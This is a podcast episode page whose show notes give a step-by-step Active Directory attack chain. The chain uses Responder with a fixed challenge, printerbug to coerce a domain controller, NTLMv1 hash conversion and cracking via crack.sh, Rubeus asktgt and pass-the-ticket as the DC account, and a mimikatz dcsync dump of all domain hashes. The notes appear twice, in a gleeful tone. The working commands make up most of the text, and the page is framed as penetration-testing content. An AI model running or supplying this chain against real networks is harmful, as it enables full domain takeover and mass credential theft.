
Sign up to save your podcasts
Or


Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):
Change the Responder.conf file like so:
; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788Run Responder with --disable-ess flag
sudo python3 /opt/responder/Responder.py -I eth0 --disable-essUse printerbug to coax authentication from a domain controller:
sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/[email protected] IP.OF.ATTACKING.BOXConvert hash to make it easier to crack!
sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDERTake the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds!
Now you can do a Rubeus asktgt with the DC hash:
rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrapNow pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!
rubeus.exe ptt /ticket:TICKET GOES HEREUse mimikatz to dump all hashes!
mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv
By Brian Johnson4.7
6868 ratings
Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):
Change the Responder.conf file like so:
; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788Run Responder with --disable-ess flag
sudo python3 /opt/responder/Responder.py -I eth0 --disable-essUse printerbug to coax authentication from a domain controller:
sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/[email protected] IP.OF.ATTACKING.BOXConvert hash to make it easier to crack!
sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDERTake the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds!
Now you can do a Rubeus asktgt with the DC hash:
rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrapNow pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!
rubeus.exe ptt /ticket:TICKET GOES HEREUse mimikatz to dump all hashes!
mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv
184 Listeners

2,002 Listeners

369 Listeners

374 Listeners

637 Listeners

1,016 Listeners

322 Listeners

416 Listeners

8,000 Listeners

175 Listeners

314 Listeners

188 Listeners

73 Listeners

134 Listeners

44 Listeners